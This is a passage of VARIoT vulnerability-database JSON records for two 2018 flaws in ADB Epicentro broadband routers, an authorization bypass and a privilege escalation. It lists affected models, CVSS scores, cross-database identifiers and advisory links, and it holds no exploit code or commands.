"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-1046",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prg av4202n",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv2220",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv5522",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv2210",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv 2210",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "p.rg av4202n",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 2220",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 5522",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "broadband gateways/routers on epicentro platform",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:dv2210_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:dv2210:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv2220_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv2220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv5522_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv5522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:prg_av4202n_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:prg_av4202n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13109"
}
]
},
"cve": "CVE-2018-13109",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-13109",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-12783",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-123135",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-13109",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-13109",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2018-12783",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-443",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-123135",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "All ADB broadband gateways / routers based on the Epicentro platform are affected by an authorization bypass vulnerability where attackers are able to access and manipulate settings within the web interface that are forbidden to end users (e.g., by the ISP). An attacker would be able to enable the TELNET server or other settings as well. plural ADB Broadband gateways and routers contain vulnerabilities related to authorization, authority, and access control.Information may be tampered with. ADBbroadbandgateways/routersonEpicentroplatform is a gateway and router device for the Epicentro platform from ADB, Switzerland. A security vulnerability exists in ADBbroadbandgateways/routers based on the Epicentro platform",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-123135",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123135"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-13109",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "148429",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "44982",
"trust": 2.3
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-12783",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97650",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-123135",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"id": "VAR-201807-1046",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
}
]
},
"last_update_date": "2023-12-18T13:56:57.646000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.adbglobal.com/"
},
{
"title": "ADBBroadbandGateways/Routers authorize patches to bypass vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/133901"
},
{
"title": "ADB broadband gateways/routers on Epicentro platform Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81864"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-863",
"trust": 1.1
},
{
"problemtype": "CWE-264",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/148429/adb-authorization-bypass.html"
},
{
"trust": 2.3,
"url": "http://seclists.org/fulldisclosure/2018/jul/18"
},
{
"trust": 2.3,
"url": "https://www.exploit-db.com/exploits/44982/"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/542119/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-13109"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-13109"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"db": "VULHUB",
"id": "VHN-123135"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"date": "2018-07-06T00:00:00",
"db": "VULHUB",
"id": "VHN-123135"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"date": "2018-07-06T14:29:01.100000",
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"date": "2018-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-07-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-12783"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULHUB",
"id": "VHN-123135"
},
{
"date": "2018-09-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-007688"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-13109"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ADB Vulnerabilities related to authorization, authority, and access control in broadband gateways and routers",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-007688"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control issues",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201807-443"
}
],
"trust": 0.6
}
}
VAR-201807-1047
Vulnerability from variot - Updated: 2023-12-18 13:28All ADB broadband gateways / routers based on the Epicentro platform are affected by a privilege escalation vulnerability where attackers can gain access to the command line interface (CLI) if previously disabled by the ISP, escalate their privileges, and perform further attacks. plural ADB Broadband gateways and routers contain vulnerabilities related to authorization, authority, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBbroadbandgateways/routersonEpicentroplatform is a gateway and router device for the Epicentro platform from ADB, Switzerland. An elevation of privilege vulnerability exists in ADBbroadbandgateways/routers based on the Epicentro platform
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201807-1047",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "prg av4202n",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv2220",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "vv5522",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv2210",
"scope": "eq",
"trust": 1.6,
"vendor": "adbglobal",
"version": null
},
{
"model": "dv 2210",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "p.rg av4202n",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 2220",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "vv 5522",
"scope": null,
"trust": 0.8,
"vendor": "adb",
"version": null
},
{
"model": "broadband gateways/routers on epicentro platform",
"scope": null,
"trust": 0.6,
"vendor": "adb",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:dv2210_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:dv2210:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv2220_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv2220:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:vv5522_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:vv5522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:adbglobal:prg_av4202n_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:adbglobal:prg_av4202n:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13110"
}
]
},
"cve": "CVE-2018-13110",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-13110",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CNVD-2018-12782",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.5,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.8,
"id": "VHN-123137",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-13110",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-13110",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-13110",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-12782",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201807-442",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-123137",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "CNNVD",
"id": "CNNVD-201807-442"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "All ADB broadband gateways / routers based on the Epicentro platform are affected by a privilege escalation vulnerability where attackers can gain access to the command line interface (CLI) if previously disabled by the ISP, escalate their privileges, and perform further attacks. plural ADB Broadband gateways and routers contain vulnerabilities related to authorization, authority, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ADBbroadbandgateways/routersonEpicentroplatform is a gateway and router device for the Epicentro platform from ADB, Switzerland. An elevation of privilege vulnerability exists in ADBbroadbandgateways/routers based on the Epicentro platform",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-13110"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689"
},
{
"db": "CNVD",
"id": "CNVD-2018-12782"
},
{
"db": "VULHUB",
"id": "VHN-123137"
}
],
"trust": 2.25
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-123137",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-123137"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-13110",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "148430",
"trust": 2.5
},
{
"db": "EXPLOIT-DB",
"id": "44984",
"trust": 2.3
},
{
"db": "JVNDB",
"id": "JVNDB-2018-007689",
